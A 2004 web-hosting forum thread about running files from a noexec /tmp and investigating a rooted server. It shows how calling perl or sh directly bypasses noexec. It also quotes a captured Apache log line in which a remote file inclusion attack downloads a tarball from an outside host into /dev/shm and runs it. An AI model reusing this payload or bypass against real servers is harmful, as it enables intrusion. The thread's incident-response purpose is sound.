
How to execute a file in a noexec tmp/?

Discussion in 'General Discussion' started by mikehvvc, Sep 12, 2004.

  1. mikehvvc

    mikehvvc Registered
    PartnerNOC

    Joined:
    Apr 27, 2004
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    151
    Hello,

    I recently read a post saying it was possible for someone to execute a file in a noexec /tmp, so is this possible, and if so, how? Thanks.



    -Mike
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Yes, it's simple.

    For example, if you copy a perl script to /tmp with noexec enabled, then this won't work:

    /tmp/script.pl

    but, this will:

    perl /tmp/script.pl

    The same goes for shell scripts, for example this won't work:

    /tmp/script.sh

    but this will:

    sh /tmp/script.sh

    It becomes only slightly more difficult with binaries in /tmp, but all you have to do is write a shell wrapper and you can then use the above.

    So, it's not much of a protection, but it is one layer in your server security structure.
     
  3. mikehvvc

    mikehvvc Registered
    PartnerNOC

    Joined:
    Apr 27, 2004
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    151
    Chirpy,

    Thank you for your reply. The reason I asked about this is that I had a box get rooted for the second time even when I locked down tmp/. Not that locking tmp/ will solve all security issues with a box, but they seem to have run the same type of exploit as before. They installed an IRC app (psybnc) and other misc binaries in tmp/. I am new to investigating such matters, so if anyone has any pointers on how to track down how they got in, please let me know. I looked in various log files and saw that they had done a portscan of some type. It ain't no nmap I will tell you, lol. Here is what I found when I do a "grep wget /usr/local/apache/domlogs/*":

    /usr/local/apache/domlogs/domain.com:ip address- - [09/Sep/2004:07:21:42 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.somedomain.biz/b?&cmd=cd%20/dev/shm;wget%20www.somedomain.or/alexander/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 558 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iOpus-I-M)"

    Anyways, if anyone has more tips on how to investigate a hack let me know. Thanks.



    -Mike
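
A decoded, per-parameter version of the `grep wget` check in the post above, as an added example that is not part of the original thread. The log lines are constructed samples modelled on the quoted entry (hosts replaced with documentation addresses), and the tool list and reason labels are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request field of an Apache combined-format log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter whose value is itself a URL (typical of remote file inclusion)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Download/unpack/run tools starting a command (assumed list, extend as needed)
TOOL_RE = re.compile(r'(?:^|[;|&`\s])(?:wget|curl|lynx|fetch|tar|perl|sh|chmod)\s')
# World-writable staging directories; /dev/shm is its own mount, separate from /tmp
STAGING_RE = re.compile(r'(?:/tmp|/var/tmp|/dev/shm)\b')

def scan_line(line):
    """Return [(parameter, reason), ...] for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m or '?' not in m.group(1):
        return []
    query = m.group(1).split('?', 1)[1]
    findings = []
    for pair in query.split('&'):      # split on '&' only; ';' stays in the value
        name, _, raw = pair.partition('=')
        value = unquote_plus(raw)      # decode %20 etc. before matching
        if REMOTE_URL_RE.match(value):
            findings.append((name, 'remote-url'))
        if TOOL_RE.search(value):
            findings.append((name, 'shell-tool'))
        if STAGING_RE.search(value):
            findings.append((name, 'writable-dir'))
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for lines with at least one finding."""
    hits = {}
    for lineno, line in enumerate(lines, 1):
        found = scan_line(line)
        if found:
            hits[lineno] = found
    return hits

# Constructed sample lines (not taken from a real server)
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Sep/2004:07:20:01 -0400] "GET /gallery/view.php?id=12&sort=date HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [09/Sep/2004:07:21:42 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://files.example.net/b?&cmd=cd%20/dev/shm;wget%20files.example.net/kit.tgz;tar%20-zxvf%20kit.tgz HTTP/1.1" 200 558 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [09/Sep/2004:07:22:10 -0400] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for lineno, found in scan(SAMPLE_LOG).items():
        print(lineno, found)
```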
     
  4. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,366
    Likes Received:
    5
    Trophy Points:
    168
    cPanel Access Level:
    Root Administrator
  5. kris1351

    kris1351 Well-Known Member

    Joined:
    Apr 18, 2003
    Messages:
    963
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Lewisville, Tx
    mod_security helps with the perl scripts running like that I believe.
     